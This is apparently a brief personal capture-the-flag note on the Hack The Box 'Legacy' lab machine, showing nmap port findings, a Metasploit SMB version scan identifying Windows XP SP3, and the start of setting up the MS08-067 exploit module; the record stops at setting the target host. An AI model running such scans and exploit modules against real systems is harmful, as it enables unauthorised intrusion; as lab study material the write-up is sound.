# Metadata
IP: 10.129.105.227
Date accessed: 07/10/2021

author :Critter


# Enum

Running nmap shows port opened:

139,445,3389

Services: SMB, Windows XP

- Using SMBClient > no access 

## Metasploit

```
sf6 auxiliary(scanner/smb/smb_version) > run

[*] 10.129.105.227:445    - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[+] 10.129.105.227:445    -   Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB)
[*] 10.129.105.227:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


```

>running SMB version 1

Potential exploits > smb relay code execution

Look up smb windows xp sp3

```
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.105.227

```